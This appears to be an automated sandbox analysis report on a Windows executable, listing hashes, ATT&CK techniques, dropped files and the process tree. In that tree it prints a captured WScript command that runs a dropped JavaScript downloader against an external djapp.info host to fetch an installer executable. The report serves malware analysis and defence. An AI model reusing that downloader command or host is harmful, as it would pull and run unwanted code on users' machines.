15d89b71aeafa09201c03a021136cf8cd12b5879c0bf6c7154d4a5e31d0ff3f6

Analysis

max time kernel
120s
max time network
125s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
04/06/2024, 11:06

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe
Size

184KB
MD5

949a5b52eabe2d8c12af9d5166575adf
SHA1

8fa5c015524f30911c8ebaee5e33663af9749a92
SHA256

15d89b71aeafa09201c03a021136cf8cd12b5879c0bf6c7154d4a5e31d0ff3f6
SHA512

38da348a6ab1c6fbb2fd868ad6edd9c45eb655e3f7aecf91308770825ec1535f28f5173ecc970662e1e17a67b61096317a48a40fade951fccb517c87ef889ee5
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3+:/7BSH8zUB+nGESaaRvoB7FJNndn7

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2744	WScript.exe
8	2744	WScript.exe
10	2744	WScript.exe
12	2536	WScript.exe
13	2536	WScript.exe
15	1748	WScript.exe
16	1748	WScript.exe
18	2224	WScript.exe
19	2224	WScript.exe
21	2304	WScript.exe
22	2304	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2344 wrote to memory of 2744	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	28
PID 2344 wrote to memory of 2744	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	28
PID 2344 wrote to memory of 2744	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	28
PID 2344 wrote to memory of 2744	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	28
PID 2344 wrote to memory of 2536	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	30
PID 2344 wrote to memory of 2536	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	30
PID 2344 wrote to memory of 2536	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	30
PID 2344 wrote to memory of 2536	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	30
PID 2344 wrote to memory of 1748	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	32
PID 2344 wrote to memory of 1748	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	32
PID 2344 wrote to memory of 1748	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	32
PID 2344 wrote to memory of 1748	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	32
PID 2344 wrote to memory of 2224	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	36
PID 2344 wrote to memory of 2224	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	36
PID 2344 wrote to memory of 2224	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	36
PID 2344 wrote to memory of 2224	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	36
PID 2344 wrote to memory of 2304	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	38
PID 2344 wrote to memory of 2304	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	38
PID 2344 wrote to memory of 2304	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	38
PID 2344 wrote to memory of 2304	2344	949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\949a5b52eabe2d8c12af9d5166575adf_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2344
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8B7D.js" http://www.djapp.info/?domain=OKHSZEgNRM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf8B7D.exe
  2⤵
  - Blocklisted process makes network request
  PID:2744
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8B7D.js" http://www.djapp.info/?domain=OKHSZEgNRM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf8B7D.exe
  2⤵
  - Blocklisted process makes network request
  PID:2536
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8B7D.js" http://www.djapp.info/?domain=OKHSZEgNRM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf8B7D.exe
  2⤵
  - Blocklisted process makes network request
  PID:1748
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8B7D.js" http://www.djapp.info/?domain=OKHSZEgNRM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf8B7D.exe
  2⤵
  - Blocklisted process makes network request
  PID:2224
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8B7D.js" http://www.djapp.info/?domain=OKHSZEgNRM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf8B7D.exe
  2⤵
  - Blocklisted process makes network request
  PID:2304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
9d8707c27d9b05496afddff2c4dd6d36

SHA1
f9aaa337482e1ece0726ce1e6a7f57605fd169a8

SHA256
c00ee48e40b4adc34a7c67750ba49bf6c99ed4f523374b86279af64f40368ab1

SHA512
c7379834e07776d0188f45b6d20d795f559fc6521c8d2a1aa8e22741391fbf34f2d8173ae34dd84526e960d4fdcc7f8715f67210327cd92814ae10ba9add8edb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
253bbb266e9a0ea53da57510cd606196

SHA1
244c099564e500d1c2948fa3bedb9705a4b132cb

SHA256
48e221a130c992960dc44c4f113668fa12b2c3e678d7f8483ff1ddeea2317476

SHA512
6b08fc9a463839c2e8031a5b855152096d683a0aa47f0d7b3425d9030d5f0c9b0f9942ce87c3f88a3ec0743f1ab17fbafa0a055970a3f9c71cf5cca60a60a0e4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
67a56e27b2c27ca97960f85f54e248a3

SHA1
107933c99347945935fb474ea9b7ed70c38fe5ec

SHA256
080257c2cc819b0819b0c27c0b0347457d76f56e576f45819835ff989b01c2f0

SHA512
b1b96f902c53106ef49848a6914747351b9a3b8324d667e96e646befdddfc0ffff98f77fe31c67abbf0a93423021d7e828d92a40cffbecd6fb124bc05395d243

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
3a19e2f5953d6880334c8d05d2f928d6

SHA1
22baf71eebc67221355436e60d3e56721db215ca

SHA256
7b4b56ff2fcd51f401044dc941b8f3bbdcef1f80477667715958df56dd5cbe68

SHA512
d9c76ce036640ec453f74946854094cfe0d7baa4daee6f78090eba21369dd2aad540717f62bbafbe5495052fd03b51d741647a909ae1f4554665c2e039793d44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
40KB

MD5
5a7f5b3bca2c6defebbd63e6fdf2cee0

SHA1
5f65d66294cacd4fecf43ca1ff9dbbd20d818940

SHA256
1d92d5ec9fd21cc714c308bccadf21b2a4dd481a79d3519237330b64dcc014c1

SHA512
28620fe484947354008f4338a6d72e9fb395de436c3d32c872553d40a6fca646568259593ea85502de460a245da1179a415b901cb3b0d3097b32e33e93f5bdcc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
6KB

MD5
6e2e8daef48ca47b3f1149577d8ac3a3

SHA1
4cdaab7f5f2fe986620b137cebde95b19e4c508f

SHA256
299fe851d2c10b0022eeca72c7288e072fd9e1e9553269a388760c39d6e17b93

SHA512
7ba18b48d64868d3d0de622b12d39777afe29ec658be761b40cc47e8ea8680ce571116bf8afbee006b053f34a60ddfeb4c60677db7307307746fbb73b123f2c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
6KB

MD5
c22856ac894ea71b437571b3a4a92f72

SHA1
b95beae2abf74ee85a200a0a38d78de7cc627cfa

SHA256
5f0f5a4785bb7ffa75e309ff21c4cbc592c4482275b3c091457dcb38ef33c93c

SHA512
00cbd2f9a7a7fdb8e705b3226b2745270899096195eb099f72ab9dce3e3079b0adbbbaf0e9b3624e1209e83c3b00f91819143981b1bbbceaae0660fe42e22e22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
6KB

MD5
e297a453b5b1e24c3815ccd87e864d29

SHA1
f587a3803ae5ebcf50a2c371ac09e8032ad6bd51

SHA256
1853e7709adae10e24622d004bd07d4f22eeda0aad363d1f364a74376b6cf799

SHA512
987591765a33cc51d8312bf60499c99fd835628b2055d2f0a6c903e84ae0c7779a40e5658c34fc12584d6b2b9ceb85f24cd8922d752ff3062a95fbe76982e3b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabD356.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarEB0B.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf8B7D.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\04ZSXVUB.txt

Filesize
177B

MD5
c78ae3dd6a3fd2a52f1a4ce442e4e680

SHA1
f05aebdfadb4ed23b1b16e9794d691895ebdcd68

SHA256
968e00ff0320605d658fbac4a81050c8d12829a1342f43e7f9912d123666b595

SHA512
1e79b5da34cdbc91d3711b2b05440018fe3dd9d73502a2510e7b10478ecd69742fbba6a6c8cc70059d61bd6da5f7f8487f4c7bb286c047bb4695d2afcda77209

Download Submit